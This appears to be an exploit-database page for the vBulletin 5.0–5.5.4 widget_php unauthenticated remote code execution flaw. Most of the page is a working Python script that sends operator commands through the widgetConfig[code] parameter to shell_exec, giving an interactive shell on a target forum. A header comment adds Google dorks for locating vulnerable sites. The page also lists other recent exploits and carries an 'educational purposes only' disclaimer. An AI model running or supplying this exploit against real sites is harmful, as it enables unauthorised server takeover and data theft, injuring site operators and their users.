Vbulletin 5.0 < 5.5.4 widget_php unauthenticated remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-09-23 | Type : webapps | Platform : php
This exploit / vulnerability Vbulletin 5.0 < 5.5.4 widget_php unauthenticated remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))

Vbulletin 5.0 < 5.5.4 widget_php unauthenticated remote code execution


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Vbulletin 5.0 < 5.5.4 widget_php unauthenticated remote code execution Vulnerability / Exploit